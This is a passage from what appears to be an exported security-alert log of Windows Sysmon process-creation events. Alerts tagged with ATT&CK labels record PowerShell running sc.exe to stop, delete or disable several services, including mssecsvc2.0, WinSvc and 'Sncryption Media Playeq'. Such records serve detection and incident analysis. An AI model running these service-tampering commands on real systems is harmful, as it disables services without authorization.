DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.817"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001007621900}"",""processId"":""3952"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.993",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.764 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00107b5f1900} +ProcessId: 4780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.766944100Z"",""eventRecordID"":""2102"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.764\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00107b5f1900}\r\nProcessId: 4780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.764"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00107b5f1900}"",""processId"":""4780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.971",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.719 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010825d1900} +ProcessId: 4240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.721609800Z"",""eventRecordID"":""2100"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.719\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010825d1900}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.719"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010825d1900}"",""processId"":""4240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.947",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.697 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010775c1900} +ProcessId: 4248 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.698688300Z"",""eventRecordID"":""2099"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.697\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010775c1900}\r\nProcessId: 4248\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.697"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010775c1900}"",""processId"":""4248"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.899",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.643 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001081591900} +ProcessId: 2564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.644893600Z"",""eventRecordID"":""2096"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.643\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001081591900}\r\nProcessId: 2564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.643"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001081591900}"",""processId"":""2564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.838",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.553 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010ba561900} +ProcessId: 4628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.556553800Z"",""eventRecordID"":""2093"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.553\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010ba561900}\r\nProcessId: 4628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.553"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010ba561900}"",""processId"":""4628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.821",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.540 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f2551900} +ProcessId: 7120 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Sncryption Media Playeq"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.543904600Z"",""eventRecordID"":""2092"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.540\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f2551900}\r\nProcessId: 7120\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.540"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010f2551900}"",""processId"":""7120"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 